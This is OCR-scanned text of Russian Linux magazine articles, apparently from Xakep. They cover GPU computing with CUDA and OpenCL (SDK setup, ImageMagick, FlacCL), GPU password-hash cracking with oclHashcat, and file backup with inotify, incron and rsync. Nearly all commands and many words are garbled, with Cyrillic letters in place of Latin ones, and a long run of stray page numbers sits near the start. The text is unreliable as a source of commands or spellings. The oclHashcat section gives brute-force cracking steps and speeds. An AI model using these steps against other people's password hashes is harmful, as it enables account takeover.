ОРУ (а пѴібіатаки вообще наняла большинство иссле- 
дователей на работу). В результате появиласьтехнология 
пѴібіа СУВА, определяющая интерфейс, с помощью кото- 
рого стало возможным перенести вычисление сложных 
алгоритмов на плечи ОРУ без каких-либо костылей. Позже 
за ней последовала АТі (АМВ) с собственным вариантом 
технологии под названием Сіозеіо МеІаКнынеОігеапп), 
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76 76 77 78 79 79 88 88 81 82 83 84 84 85 85 86 87 В7 87 87 В7 88 89 В9 89 90 91 92 93 94 94 94 94 95 95 96 96 

96 96 97 97 97 98 98 99 99 188 101 101 101 181 101 102 183 184 104 184 104 105 106 106 186 186 106 107 188 ІЙ 

В 108 109 110 111 112 112 113 114 115 116 117 118 118 118 119 120 128 128 120 121 121 122 123 123 124 125 126 
126 127 127 128 129 129 129 130 138 138 130 130 138 138 131 131 131 131 132 133 133 134 135 136 136 137 137 13 
В 139 140 141 142 143 144 144 144 144 145 146 146 147 147 147 147 147 147 147 147 147 147 147 148 149 149 149 
149 158 150 150 158 158 151 151 152 153 153 153 154 155 155 156 157 157 157 157 157 157 157 158 159 159 159 15 
9 159 159 160 161 162 162 163 163 163 164 164 164 164 165 166 167 168 169 170 171 172 172 173 173 174 174 174 
174 175 175 176 176 176 176 177 177 177 178 178 179 188 181 181 182 102 183 184 184 185 186 187 187 188 188 ІЙ 
9 189 198 191 192 192 192 192 193 193 194 195 196 1% 196 197 198 199 280 200 281 201 202 202 282 202 203 204 
285 206 206 287 208 208 208 289 209 210 210 210 211 212 213 213 214 215 215 216 217 218 219 220 221 222 223 22 
4 224 225 226 226 226 226 227 227 227 227 228 229 238 231 232 233 233 233 234 234 234 234 235 235 236 237 238 
239 239 240 241 242 242 243 244 244 245 245 245 246 247 247 248 240 249 249 250 250 258 251 252 253 254 255 25 
6 257 257 258 259 268 268 260 260 268 261 261 262 263 263 263 264 
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а совсем скоро появилась ставшая стандартом версия от 
Арріе, получившая имя ОрепСЕ. 

ОРЕІ — наше все? 

Несмотря на все преимущества, техника СРСРУ имеет не- 
сколько проблем. Первая из нихзаключается в оченьузкой 
сфере применения. ОРУ шагнули далеко вперед централь- 
ного процессора в плане наращивания вычислительной 
мощности и общего количества ядер (видеокарты несут на 
себе вычислительный блок, состоящий из более чем сотни 
ядер), однако такая высокая плотность достигается за счет 
максимального упрощения дизайна самого чипа. 

В сущности основная задача ОРУ сводится к математиче- 
ским расчетам с помощью простых алгоритмов, получаю- 
щих на вход не очень большие объемы предсказуемых 
данных. Поэтой причинеядра ОРУ имеюточень простой 
дизайн, мизерныеобъемы кэша и скромный набор ин- 
струкций, что в конечном счете и выливается в дешевизну 
их производства и возможность очень плотного размеще- 
ния на чипе. ОРУ похожи на китайскую фабрику стысячами 
рабочих. Какие-то простые вещи они делают достаточно 
хорошо(а главное— быстро и дешево), но если доверить 
им сборку самолета, то в результате получится максимум 
дельтаплан. Поэтому первое ограничение ОРУ — это 
ориентированность на быстрые математические расчеты, 
что ограничивает сферу применения графических процес- 
соров помощью в работе мультимедийных приложений, а 
также любых программ, занимающихся сложной обработ- 
кой данных (например, архиваторов или систем шифро- 
вания, а также софтин, занимающихся флуоресцентной 
микроскопией, молекулярной динамикой, электростатикой 
и другими, малоинтересными для линуксоидов вещами). 
Вторая проблема ОРОРУ в том, что адаптировать для 
выполнения на ОРУ можно далеко не каждый алгоритм. 
Отдельно взятые ядра графического процессора довольно 
медлительны, и их мощь проявляется только при работе 
сообща. А это значит, что алгоритм будет настолько эффек- 
тивным, насколько эффективно его сможет распаралле- 
лить программист. В большинстве случаев стакой работой 
можетсправиться только хороший математик, которых 
среди разработчиков софта совсем немного. 

И третье: графические процессоры работаютс памятью, 
установленной на самой видеокарте, так что при каждом 
задействовании ОРУ будет происходить две дополнитель- 
ныхоперации копирования: входныеданные из опера- 
тивной памяти самого приложения и выходныеданные из 
ОРАМ обратно в память приложения. Нетрудно догадаться, 
что это можетсвести на нет весь выигрыш во времени 




• Суть технологии 
ОРОРУ — произволь- 
ные вычисления на 
видеокартах. 

• Существует ОрепСЕ 
5ВК, разрабатывае- 
мый компанией Іпіеі, 
но пока с его помо- 
щью можно запускать 
приложения только на 
классическом ОРУ. 

• ЕА5ТРАІІ - 
суперкомпьютер, 
построенный с ис- 
пользованием 13 ви- 
деокарт, мощностью 
12ТЕЕ0Р5: Іа5Іга2. 
иа.ас.Ье . 
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• Ь2Ір2-сиба.діІ:ЬиЬ. 
сот — реализация 
архиватора б 2 Ір 2 

с использованием 
СУОА. 

• ѵѵѵѵѵѵ.Ьоорое-сІоиб. 
сот — облачный 
сервис, позволяющий 
загружать и запускать 
софт с поддержкой 
СУОА и ОрепСЕ. 
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Команда сііпіо позволит определить, есть ли в системе 
ЗІгеат-устройства 



работы приложения (каки происходит в случае с инструментом РІасСІ, 
который мы рассмотрим позже). 

Но и это еще не все. Несмотря на существование общепризнанного 
стандарта в лице ОрепСІ, многие программисты до сих пор предпо- 
читают использовать привязанные кпроизводителю реализации 
техники ОРОРН. Особенно популярной оказалась СООА, которая хоть 
и даетболее гибкий интерфейс программирования (кстати, ОрепСІв 
драйверах пѴібіа реализован поверхСООА), но намертво привязывает 
приложение к видеокартам одного производителя. 

Что есть сейчас? 

В силусвоей молодости, а также благодаря описанным выше про- 
блемам, ОРОРНтаки нестала по-настоящему распространенной 
технологией, однако полезный софт, использующий ее возможности, 
существует (хоть и в мизерном количестве). Одними из первых появи- 
лись крэкеры различных хэшей, алгоритмы работы которых очень легко 
распараллелить. Также родились мультимедийные приложения, на- 
пример, кодировщик РІасСІ, позволяющий перекодировать звуковую 
дорожку в формат РІАС. Поддержкой ОРОРО обзавелись и некоторые 
уже существовавшие ранее приложения, самым заметным из которых 
стал ІтадеМадіск, который теперьумеет перекладывать часть своей 
работы на графический процессор с помощью ОрепСІ. Также есть про- 
екты по переводу на СПВА/ОрепСине любятюниксоиды АТі) архивато- 
ров данных и других систем сжатия информации. Наиболее интересные 
из этих проектов мы рассмотрим в следующих разделах статьи, а пока 
попробуем разобраться стем, что нам нужно для того, чтобы все это за- 
велось и стабильно работало. 

Во-первых, понадобится видеокарта, поддерживающая техноло- 
гию СУВА или Бігеат. Необязательно, чтобы она была топовая, 
достаточно только, чтобы год ее выпуска был не менее 2009. Полный 
список поддерживаемых видюшек можно посмотреть в Википедии: 
еп.ѵѵікіребіа.огд/ѵѵікі/СиРА и еп.\л/ікіребіа.огд/\л/ікі/АМР Зігеат 
Ргосеззог . Также о поддержке той или иной технологии можно 
узнать, прочитав документацию, хотя в большинстве случаев будет 
достаточным взглянуть на коробку из под видеокарты или ноутбука, 
обычно на нее наклеены различные рекламные стикеры. 

Во-вторых, в систему должны быть установлены последние проприе- 
тарные драйвера для видеокарты, они обеспечат поддержку как родных 
для карточки технологий ОРОРР, так и открытого ОрепСР. 

И в-третьих, так как пока дистрибутивостроители еще не начали рас- 
пространять пакеты приложений с поддержкой ОРОРП, нам придется 
собирать приложения самостоятельно, а для этого нужны официальные 
БОК от производителей: СПОАТооІкіІ; ( доо.діЛЬбхт ) или АТІ Бігеат БОК 
( доо.д[/УБ2К ). Они содержат в себе необходимые для сборки приложе- 
ний заголовочныефайлы и библиотеки. 

Ставим си РА ТооІкіІ 

Идем по вышеприведенной ссылке и скачиваем СІІОАТооІкіІ; для Ыпих 
(выбрать можно из нескольких версий, для дистрибутивов Ребога, 

РНЕР, РЬипІи и БРБЕ, есть версии какдля архитектуры х86,такидля 
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пѴісІіа СІЮА поддерживает несколько разных реализаций 
ОРОРУ 



х86_64). Кроме того, там же надо скачать комплекты драйверов для раз- 
работчиков (ОеѵеІорегОгіѵегз [огЫпих, они идутпервыми в списке). 
Запускаем инсталлятор БОК: 



$ Бибо 5І1 сиба1:оо1кі1;_4.0.17_1іпих_64_иЬип1;и10.10. гип 

Ко ГД а установка будетзавершена, приступаем кустановке драйверов. 
Для этого завершаем работу Х-сервера: 



# Бибо /е1;с/іпі1;.б/§бт БТор 

Открываем консоль <Сі;г[+А[1;+Е5> и запускаем инсталлятор драйверов: 

$ Бибо Бб беѵбгіѵег_4.0_1іпих_64_270.41.19. гип 

После окончания установки стартуем иксы: 

$ БТагТх 

Чтобы приложения смогли работать с СІІОА/ОрепСЕ, прописываем путь 
до каталога с СиОА-библиотеками в переменную Е0_Е1ВРАРУ_РАТН: 

$ ехрогі; 10_ІІВКАКУ_РАТН=/иБг/1оса1/сиба/1іЬ64 

Или, если ты установил 32-битную версию: 

$ ехроП; Ю_ІІВКАКУ_РАТН=/иБг/1оса1/сиба/1іЬ32 

Также необходимо прописать путьдозаголовочныхфайлов СООА, 
чтобы компилятор их нашел на этапе сборки приложения: 

$ ехрогі; С_ІМСІІЮЕ_РАТН=/иБг/1оса1/сиба/іпс1ибе 

Все, теперь можно приступить ксборке СУВА/ОрепСЕ-софта. 

Ставим АТІ 51геат 50К 

Бігеат БОКнетребуетустановки, поэтому скачанный ссайта АМО- 
архив можно просто распаковать в любой каталог (лучшим выбором 
будет/орі) и прописать путь до него во всютуже переменную 
иВРАРУ_РАТН: 



$ ы§е1; б1;1;р://§оо.§1/СМСМо 

$ Бибо 1;аг -хіТ ~/АМ0-АРР-50К-ѵ2.4-1пх64.1;§2 -С /ор1; 

$ ехрогі; \ 

Ю_ІІВКАКУ_РАТН=/ор1;/АМ0-АРР-50К-ѵ2.4-1пх64/1іЬ/х86_64/ 

$ ехрогі; С_ІМСіи0Е_РАТН=/ор1;/АМ0-АРР-50К-ѵ2.4-1пх64/іпс1ибе/ 

Каки в случае с СІЮАТооІкіІ;, х86_64 необходимо заменить на х86 в 
32-битных системах. Теперь переходим в корневой каталог и рас- 
паковываем архив ісб-гедізігаііоп.ідг (это своего рода бесплатный 
лицензионный ключ): 
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Для активизации ОрепСІ на базе пѴібіа тебе понадобятся 
СиОА ТооІкіІ и драйвера для разработчиков 



$ Бисіо 1;аг -хі-Р \ 

/ор1:/АМ0-АРР-50К-ѵ2.4-1пх64/іссІ-ге§І5І:га1;іоп.1;§2 -С / 




Скорость кодирования РІасСІ может в десятки раз превос- 
ходить скорость стандартного кодека ^Іас 



Если же СЛОВОМ «по» отмечена последняя строка, значит, дело в пере- 
менной ЕО_иВРАРУ_РАТН. Если все окей, запускаем процесс сборки/ 
установки: 



Проверяем правильность установки/работы пакета с помощью инстру- 
мента сІіпЬ: 

$ /ор1;/АМ0-АРР-50К-ѵ2.4-1пх64/Ьіп/х86_64/с1іп-Ро 

ІтадеМадіск и ОрепСІ 

Поддержка ОрепСЕпоявилась в ІтадеМадіскуже достаточно давно, 
однако поумолчанию она не активирована ни в одном дистрибутиве. 
Поэтому нам придется собрать ІМ самостоятельно из исходников. 
Ничего сложного в этом нет, все необходимое уже есть в ВПК, поэтому 
сборка не потребует установки каких-то дополнительных библиотекот 
пѴісІіа или АМП. Итак, скачиваем/распаковываем архив с исходниками: 

$ ы§е1: Іі1;1;р://§оо.§1/Р6ѴУѴ 
$ 1;аг -хд-р Іта§еМа§іск-6.7.0-0.1:аг.Ь22 
$ ссі Іта§еМа§іск-6.7.0-0 

Далееустанавливаем инструменты сборки: 

$ зисіо ар1;-§е1; іп5І;а11 Ьиі1сІ-е55еп1;іа1 

Запускаем конфигуратор и грепаем его вывод на предмет поддержки 
ОрепСЕ: 

$ 10РІАС5=-1$10_ІІВКАКУ_РАТН ./сопРі§иге | \ 

§гер -е сі.б -е ОрепСІ 

Правильный результат работы команды должен выглядеть примерно 
так: 

сІіескіп§ Сі/сі.б изаЬіИііу. . . уез 
сІіескіп§ Сі/сі.б ргезепсе. . . уез 
сІіескіп§ -Рог Сі/сі.б. . . уез 
сІіескіп§ ОрепСІ/сІ.б изаЬіІіІіу. . . по 
сІіескіп§ ОрепСІ/сІ.б ргезепсе. . . по 
сІіескіп§ -Рог ОрепСІ/сІ.б. . . по 
сІіескіп§ -Рог ОрепСІ ИЬгагу. . . -ІОрепСІ 

Словом «уез» должны быть отмечены либо первыетри строки, либо 
вторые (или оба варианта сразу). Если это нетак, значит, скорее всего, 
была неправильно инициализирована переменная С_1МСЕЕЮЕ_РАТН. 



$ Бисіо таке іпБІ;а11 сіеап 

Проверяем, что ІтадеМадіск действительно был скомпилирован с под- 
держкой ОрепСЕ: 

$ /иБг/1оса1/Ьіп/сопѵег1; -ѵегБІоп | §гер РеаІіигеБ 
РеаІіигеБ: ОрепМР ОрепСІ 

Теперь измерим полученный выигрыш в скорости. Разработчики 
ІтадеМадіск рекомендуют использовать для этого фильтр сопѵоіѵе: 

$ 1;іте /иБг/Ьіп/сопѵег1; іта§е.др§ -сопѵоіѵе \ 

■-1, -1, -1, -1, 9 , -1, -1, -1, -1' іта§е 2 .др§ 

$ 1;іте /иБг/1оса1/Ьіп/сопѵег1; іта§е.др§ -сопѵоіѵе \ 

'-1, -1, -1, -1, 9 , -1, -1, -1, -1' іта§е 2 .др§ 

Некоторые другие операции, такие как ресайз,теперьтоже должны ра- 
ботать значительно быстрее, однако надеяться на то, что ІтадеМадіск 
начнетобрабатывать графику с бешеной скоростью, не стоит. Пока еще 
очень малая часть пакета оптимизирована с помощью ОрепСЕ. 

РІасСІ (РІасисІа) 

ЕІасСЕІ ѵѵѵѵѵѵ.сиеІооІз.пеі/сІоки.рЬр/І'ІасисІа ] — это кодировщикзвуковых 
файлов в формат ЕЕАС, задействующий в своей работе возможности 
ОрепСЕ. Он входит в состав пакета СЕІЕТооІз [ ѵѵѵѵѵѵ.сиеіооіз.пеі/сіоки. 
рЬр ) для ѴѴіпбоѵѵз, но благодаря топо может быть использован и в Еіпих. 
Для получения архива с кодировщиком выполняем следующую коман- 
ду: 

$ тксііг Пассі && ссІ Нассі 

$ ы§е1; ыыы.сие1;ооІБ.пе1:/іпБІ:а11/11асс103.гаг 

Далееустанавливаем ипгаг, топо и распаковываем архив: 

$ Бисіо ар1;-§е1; іпБІ;а11 ипгаг топо 
$ ипгаг X Иасс103.гаг 

Чтобы программа смогла найти библиотеку ОрепСЕ, делаем символи- 
ческую ссылку: 

$ 1п -Б $Ю_ІІВКАКУ_РАТН/1іЬ0репСІ.БО ІіЬорепсІ.БО 
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СРІІ уже давно обогаали х86-процессоры в производительности 



Теперьзапускаем кодировщик: 

$ топо СІІЕТооІБ.РІАССІ.стсІ.ехе тизіс.ыаѵ 

Если на экран будет выведено сообщение об ошибке «Еггог: Рериезіеб 
сотрііезіге із ЬіддегіЬап іЬе гедиігебѵѵогкдгоирзіге 01^32», значит, у 
нас в системе слишком слабенькая видеокарта, и количество задей- 
ствованныхядер следует сократитьдо указанного числа с помощью 
флага ‘--дгоир-5І2еХХ’, где XX— нужное количество ядер. 

Сразу скажу, из-за долгого времени инициализации ОрепСЕзаметный 
выигрыш можно получить только на достаточно длинных дорожках. Ко- 
роткие звуковые файлы ЕІасСЕ обрабатывает почти стой же скоростью, 
что и его традиционная версия. 

осІНазИсаІ или брутфорс по- 
быстрому 

Какяуже говорил, одними из первых поддержку О РО РУ в свои про- 
дукты добавили разработчики различных крэкеров и систем брутфорса 
паролей. Для них новая технология стала настоящим святым граалем, 
который позволил с легкостью перенести от природы легко распарал- 
леливаемый код на плечи быстрых ОРУ-процессоров. Поэтому неуди- 
вительно, что сейчас существуют десятки самых разных реализаций 
подобных программ. Но в этой статье я расе кажу толь ко об одной из них 
— осІНазЬсаІ;. 

осІНазЬсаІ; [ ЬазЬсаУпеі/осІЬазЬсаІ:/ ] — это ломал ка, которая умеет 
подбирать пароли по иххэшусэкстремально высокой скоростью, 
задействуя при этом мощности ОРУ с помощью ОрепСЕ. Если верить 
замерам, опубликованным на сайте проекта, скорость подбора М05- 
паролей на пѴібіа ОТХ580 составляет до 1 5800 млн комбинаций в секун- 
ду, благодаря чему осІНазЬсаІ; способен найти средний по сложности 
восьмисимвольный парольза какие-то? минут. 

Программа поддерживаетОрепСЕи СУПА, алгоритмы МП5, 
тб5($разз.$заи), тб5(тб5($разз)), ѵПоНеОп < ѵЗ.8.5, 5НА1 , 
зЬаІ ($разз.$заЕ), хэши МуЗОЕ, МП4, МТЕМ, Потаіп СасЬеб Сгебепбаіз, 
5НА256, поддерживаетраспределенный подбор паролей сзадейство- 
ванием мощности нескольких машин. 



Автор не раскрываетисходники (что, в общем-то, логично), ноу про- 
граммы есть нормально работающая Еіпих-версия, которую можно по- 
лучитьна официальной страничке: ЬазбсаЕпе1:Лі[ез/ос[НазЬса1:-0.25.72 . 
Далее следует распаковать архив: 

$ 72 X ос1На5Ііса1;-0.25.72 
$ ссі ос1На5Ііса1:-0.25 

И запустить программу (воспользуемся пробным списком хэшей и 
пробным словарем): 

$ ./ос1На5Ііса1:64.Ьіп ехатріе. Ііазіі ?1?1?1?1 \ 
ехатріе.сіісі: 

осІНазЬсаІ; откроеттекст пользовательского соглашения, с которым 
следует согласиться, набрав «УЕ5». После этого начнется процесс 
перебора, прогресс которого можноузнать по нажатию <з>. Чтобы 
приостановить процесс, кнопаем <р>, для возобновления — <г>. 

Также можно использовать прямой перебор (например, отаааааааа до 
22222222 ): 

$ ./ос1На5Ііса1:64.Ьіп базіі.ііхі: ?1?1?1?1 \ 

? 1 ? 1 ? 1?1 

И различные модификации словаря и метода прямого перебора, атак- 
же их комбинации (об этом можно прочитать в файле босз/ехатріез.іхі;). 
В моем случае скорость перебора всего словаря составила 1 1 минут, 
тогда как прямой перебор (отаааааааа до 22222222 ) длился около 40 ми- 
нут. В среднем скорость работы ОРУ (чип РѴ71 0) составила 88,3 млн/с. 

Выводы 

Несмотря на множество самых разных ограничений и сложность разра- 
ботки софта, ОРОРУ — будущее высокопроизводительных настольных 
компов. Но самое главное — использовать возможности этой техноло- 
гии можно прямо сейчас, и это касается нетолько ѴѴіпбоѵѵз-машин, но 
и Еіпих. -и- 
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■ ■ Евгений Зобнин (ехесЬіІ.ги) 



ПОВЕЛИТЕЛЬ 

файлов 

1 000 и один способ откатить 
и синхронизировать файлы 

@ Случайно затертые или замененные файлы - бич абсолютно всех 
пользователей Ыпих. Любой из нас хоть раз в жизни лишался важ- 
ных данных из-за банальной халатности: одна команда - и дан- 
ные, над которым работал многие дни и недели, исчезает в одно 
мгновение. И в большинстве случаев их уже не вернуть. В зтой ста- 
тье я расскажу, как избежать таких ситуаций. 




Введение в проблему 

В каких случаях мы обычнотеряем файлы? Я бы выделил два наиболее 
популярных сценария: 

1 . «Что это за старое файле? В мусорку!». Зачастую мы удаляем важные 
файлы просто по ошибке, или думая, что они уже не содержат важной 
для нас информации. Это стандартный сценарий, знакомый всем. 

2. «Щас я исправлю этот файл, и та штука заработает быстрее». Более 
сложный вариант, при котором человекхочет сделать лучше, но по- 
лучаетхудший вариант, а когда пытается вернуть все на место, уже точно 
не помнит, что содержал файл изначально. Это типичная проблема 
кодеров, сисадминов, веб-дизайнеров и просто экспериментаторов. И 
одна из причин появления систем контроля версий. 

Как избежатьтаких ситуаций? Очень просто: не попадать в них. Аесли 
серьезно, то нам нужна какая-то система, которая бы помнила содер- 
жимое всех наших файлов и хранила бы их прошлые версии (включая 
те, оригиналы которых были удалены). Тогда влюбой моментвремени 
мы сможем вернуть все на место без потерь. Виде лучше, если система 
предоставит способ синхронизировать этот архи в на удаленную машину, 
чтобы данные остались с нами даже в случае тотально го краха всего и 
вся. 

Простейшая система отката 

Незаморачиваясь с чем-то более сложным итребуюідем настройки, 
попробуем представить себе, как может выглядеть простейшая система 
отката файлов кпредыдуідим версиям. Скорее всего, это будет нечто 

вроде ЭТОГО: 



// Хммм^ я хочу отредактировать файл соп1^§.с■Р§^ но не хочу 
его потерять 

$ ср соп1і§.с-Р§ соп1і§.с-Р§.Ьак 
// Окей^ теперь можно редактировать 
$ ѵіт соп1і§.с-Р§ 

// Бррр^ теперь ничего не работает^ придется вернуть оригинал 
$ тѵ соп1і§.с-Р§.Ьак сопб§.с-Р§ 

Готов поспорить, что хоть раз в жизни ты так делал. Я тоже. И это хорошо, 
однако вводитьлишние команды перед каждым редактированием 
файла оказывается не очень-то удобно. Со временем начинаешь просто 
забивать на резервные копии. 

Мы можем развить идею и написать функцию, которая будет делать 
бэкап автоматически, прямо во время открытия файла на редактирова- 
ние. Также можно написать функцию, которая вернет файл из бэкапа. 
Выглядетьони могуттак: 

ѵіт() { 

РІІЕ=$1 

ОАТЕ='сІа1;е +'%Р’' 

ВАК=.$РІІЕ.Ьак 
ср $РІІЕ $ВАК-$ОАТЕ 
гт -і= $ВАК 

1п -5 $ВАК-ОАТЕ $ВАК 
ѵіт $РІІЕ 

} 
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Зирег 



ЬМ$ создает иллюзию сосуществования 
нескольких (файловых деревьев в рамках 
снапшотов, однако все они связаны 



Кооі Тгее 


Ехіепі Кооі 
Роіпіег 


8иЬѵоІшпе 'сІеГаиІГ 
Роіпіег 


8пар.чНо( 'япар* 
Роіпіег 


Оігесіогу ііет}і 

иеГаііІі 

8пар 



Ехіепі Тгее 




ВІоск аііосаііоп 
ІпІ'огтаііоп апсі 
КеГегепсе Соипь 



ЫгГз - СШІГОІ а Ыгіѣ ^іІегуз^Ёпл 

5ѴМ0Р5І5 

ЫгТз ^иЬио]іиг№ зпарзЬоІ <5оигсе> [<(Іеаі:>/Кпаітіе> 

ЫгІГэ 5ііЬиа]ите гіеіеіе <эиЬѵа1ипіБ> 

ЫгІ'Е ЕцЬуоІите сгааіе Е«іе5І>/1<пйте> 

ЬІгТз 5иЬиа1иі№ Изі <ра1:Н> 

ЫгТз зіаьѵоіипіе зеІ-сіеТаиИ <ісі> <оа1:Іі> 

ЫгТз ГіІЕ'зуз.ІЕп сІвГгад <Ті 1е>КсІІг> К1^іІ&>КсЦг> , . , ] 

Ыг^5 ^іІЕзузІБіп 5упс <раШ> 

Ше^уаіал геэіге ^Ше§и^1е[Г>> 

ЫгТе сіеѵісв 5сап [<<^вѵісе> [<сІеѵІсе>^ . ] 1 
ЫгГн іЗеѵісЕ зГюи КІаЬдІ ^ , І 

ЫгТа (Іеѵісв Ьаіапсе <оа1Ь> 



Во РгееВЗО есть 
аналог подсистемы 
ІпоРІу под названи- 
ем к^иеие, однако 
утилит, способных 
задействовать его 
возможности, нет. 



Возможностями (файловой системы Ыгі$ можно 
управлять и с помощью одноименной утилиты 



тѵ .$1. Ьак $1 



} 



Поместив их в файл -/.ЬазЬгс, ты получишь команду ѵіт, 
которая будет бака пить файл при каждом его открытии 
(делая его скрытым и помечая датой), и команду гер которая 
позволит вернуть файл из самого свежего бэкапа на место. 
Это довольно действенный способ, и я использую его для 
конфигурированияудаленных серверов, но на домашней 
машине он окажется не оченьэффективным. Здесьфайлы 



могут быть далеко нетекстовыми, а в качестве редактора 
использоваться куча разных программ. Более гибкая систе- 
ма должна перехватыватьлюбые попытки изменить файл 
на уровне системы и делать бэкап автоматически. 

Доверимся ядру 

Трудно найти более подходягций и н струме нт для тотальной 
слежки за файлами, чем Іпоііі'у. Работая внутри Ыпих- 
ядра, эта подсистема не пропустит ни одного изменения, 
открытия или закрытия файла, а мы сможем узнать об этом 
с помогцью простой консольной команды под названием 
іпоііі'уѵѵаіі;. 

Іпоііі'уѵѵаіі; (которая входит в состав пакета іпоііі'у-іооіз) 

— примитивная утилита, она ждетуказанного события, 
связанного с определенным файлом, а затем завершается 
или пишет в лог о том, что произошло. Ее очень удобно ис- 
пользовать в скриптах: достаточно просто добавить вызов 
команды в начало скрипта, а далее поместить код, манипу- 
лируюгций файлом или каталогом. 

Для нашей задачи іпоііі'уѵѵаіі; подходит идеально, в качестве 
события мы можем указать не просто доступ к файлу, а 
завершение операции его изменения, тем самым загци- 
тивсебя отситуаций, когда файл открывается просто «на 
посмотреть»: 

$ ѵі ~/Ьіп/іп-Ьаск.5Н 

#!/Ьіп/5іі 
01 К=' рысі' 




> ѵѵагпіпд 

Ни в коем случае не 
используй Ізпірег 
для наблюдения за 
Іоггепі-за грузкам и. 
Тоггепі-клиенты 
создают файл еще 
до его фактической 
загрузки, поэтому ты 
рискуешь ввести их в 
ступор. 



НТТР://ѴѴѴѴѴѴ 



■ 

> Ііпкз 

бізІапг.сЬ/іпоІаіІ/ — 
версия Іаіі, основан- 
ная на Іпобіу. 
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[^1|п@ту^^оз1 "']$ і по! і ■Туша и -т /ргос 
Зеіііпд ир шаісМез. 

ЫаісМез езіаЫізМесі. 

/ргос/ ОРЕМ тетіп'Го 

/ргос/ ВССЕ55 тетіп'Го 

/ргос/ С105Е_Н0ИРІТЕ,С105Е тешіпГо 

/ргос/ ОРЕМ тетіп'Го 

/ргос/ РССЕ55 тетіпГо 

/ргос/ а05Е_Н0ИРІТЕ,СЮ5Е тетіпГо 

/ргос/ ОРЕМ З'Іа'Ь 

/ргос/ РССЕ55 з'ЬаІ 

/ргос/ а0БЕ_Н0ИРІТЕ,СЮ5Е зіаі: 

/ргос/ ОРЕМ з'Іа'Ь 

/ргос/ ЯССЕ55 з'іаі 

/ргос/ РССЕ53 зІа'Ь 

/ргос/ ВССЕ55 з'Ьа'і 

/ргос/ а05Е_Н0ИРІТЕ,СЮ5Е зіаі 

/ргос/ ОРЕМ тетіп'Го 

/ргос/ РССЕ55 тетіпГо 

/ргос/ а05Е_Н0ИРІТЕ,СІО5Е тетіпГо 

/ргос/ ОРЕМ тетіпГо 

/ргос/ РССЕ55 тетіпГо 

/ргос/ а05Е_Н0МРІТЕ,СЮ5Е тетіпГо 

"С 

[^1т@туЬозГ ~]$ | 

Тестируем іпоІіІу\л/аіІ на каталоге /ргос 



ыііііе іпо1:і-Руыаі1: -г -е тосіі-ру $ОІК; сіо 
ср $ОІК ~/Ьак/.$ОІК.Ьак 
сіопе; 

Этот скрипт будет делать резервную копию текущего каталога каждый 
раз, когда один из файлов внутри него будет изменен. Это самая про- 
стая реализация скрипта, которая неучитываетсообщения самого 
іпоііі'уѵѵаіі; и поэтомуделает работу очень грязным методом, просто 
копируя весь имеющийся каталог. Более сложная реализация может 
выглядеть так: 



$ ѵі ~/Ьіп/іп-Ьаск2.зИ 

#!/Ьіп/5іі 
ОІК=' рысі' 

іпо1;і-Руыаі1: -шг --1;іте-Рт1; '%сі-%т-%у %Н-%М' \ 

--■Рогта1;'%Т %-р' -е сІ05е_ыгі1;е $ОІК | \ 
ыбііе геасі ОАТЕ ТІМЕ РНЕ; сІо 

ср $РІІЕ .$РІЕЕ.Ьак-$ОАТЕ-$ТІМЕ 
сіопе 

Это своего рода универсальная версия подхода, рассмотренного в на- 
чале статьи. С помощью флага '-т' мы заставили іпобі'уѵѵаіі; писать лог 
изменений файлов в стандартный вывод, с помощью опций '--бтеі'ппі;' и 
'--ЬгтаБ мы изменили ее вывод та к, чтобы влогпопадали дата, время, 
а также имя изменяемого файла. Далее мы сделали цикл, который чита- 
ет этот лог и копирует измененные файлы, делая их скрытыми и добав- 
ляя к имени дату и время изменения. Впоследствии все сохраненные 
таким образом файлы можно будетувидетьс помощьютакой команды: 

$ І5 -Іа I §гер -е ' .*\.Ьак-\.*' 



Аудалить — с помощьютакой: 



$ гт -г-Р *.Ьак-* 

Во второй части статьи, когда мы будем говорить о способах синхро- 
низации файлов между машинами, я покажуболее развитую версию 
этого скрипта, а пока рассмотрим инструменты іпсгоп и [зпірег, которые 
делают работу с іпобі'у более удобной. 

Планировщик для файлов 

Утилита іпобі'уѵѵаііудобна и проста в использовании, она хорошо подхо- 
дитдля тривиальных скриптов, но реализовать систему тотальной слеж- 
ки за файлами с ее помощью довольно сложно. Поэтому мы воспользу- 
емся более высокоуровневым инструментом под названием іпсгоп. 
Демон іпсгоп, как нетрудно догадаться по названию, это Іпобі'у-версия 
стандартного с гоп. Он читает список правил, затем переходите фон и 
ждет, пока не наступитописанное в правилах событие. Когда это про- 
исходит, запускается указанное приложение/скрипт, которому могут 
быть переданыта кие аргументы, каквремя модификации, имя файла и 
каталога и другие. Всего их четыре: 



$@ - каталог/файл ^ за которым ведется наблюдение 
$# - имя файла^ с которым связано произошедшее событие 



Пишем скрипт для удаленного бэкапа файлов 



Ц]! /Ьіп/бН 
0Ш='ршсі' 

й Имя пользователя на удаленном хосте 
иЗЕР="ѵа5уа" 
й Имя удаленного хоста 
Н05Т="Иозі.сот" 

й Каталог для Бэкапа на удаленном хосте 
РЕИ0ІР=‘7Ьас1<ир 

іпоІіТушаіІ -шг — іітеТтІ '2с1-%[п-%у ХН-%Г1' — ТогтаІ’ХТ -е с1озе_шгі1е $ОІР І\ 

шЬіІе геасі ОРТЕ ТШЕ РІЬЕ; сіо 

гзупс -а — сіеіеѣе -е ззБ ${0ІР}/${РІЕЕ> ${и5ЕР}Ш${Н05Т} :$СРЕП0ІР} 

сіопе 



/Ьіп/іп-г5упс.зЬ[ + ] СзЫ 35 Вх2Э [1.1КБ2] 



— ВСТНВКН (Вклейка) — 
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$% - флаги события (в текстовом формате) 

$& - флаги события (в числовом формате) 

Для добавления событий и правил используется сгоп-подобная утилита 
іпсгопІаЬ, вызов которой с флагом '-і' приведет к распечатке текущего 
списка правил. Для добавления новых правил используем уже знако- 
мый посгоп флаг'-е'. Откроется редактор, в который можно вписать пра- 
вила и закрепленныеза ними команды, используя следующий шаблон: 

[путь] [действие] [команда] 

Здесь «путь» — это путь до файла/каталога, «действие» — операция, 
совершаемая над файлом, а «команда» — это команда, которая будет 
выполнена в случае возникновения действия по отношению куказанно- 
му файлу (в качестве аргументов могутбыть использованы приведенные 
выше метапеременные). 

Списокподдерживаемыхдействий полностью совпадает со списком 
действий самой подсистемы іпобі'у и команды іпобі'уѵѵаіі;. Вотон: 

ІМ_АССЕ55 - Произошло обращение к файлу (например^ чтение) 
ІМ_АТТКІВ - Метаданные файла (такие как владелец или права 
доступа) были изменены 

ІМ_С105Е_1лІКІТЕ Рііе -Файл^ открытый для записи^ был успешно 
закрыт 

ІМ_С105Е_М01лІКІТЕ Рііе-Файл^ открытый не для записи^ был закрыт 
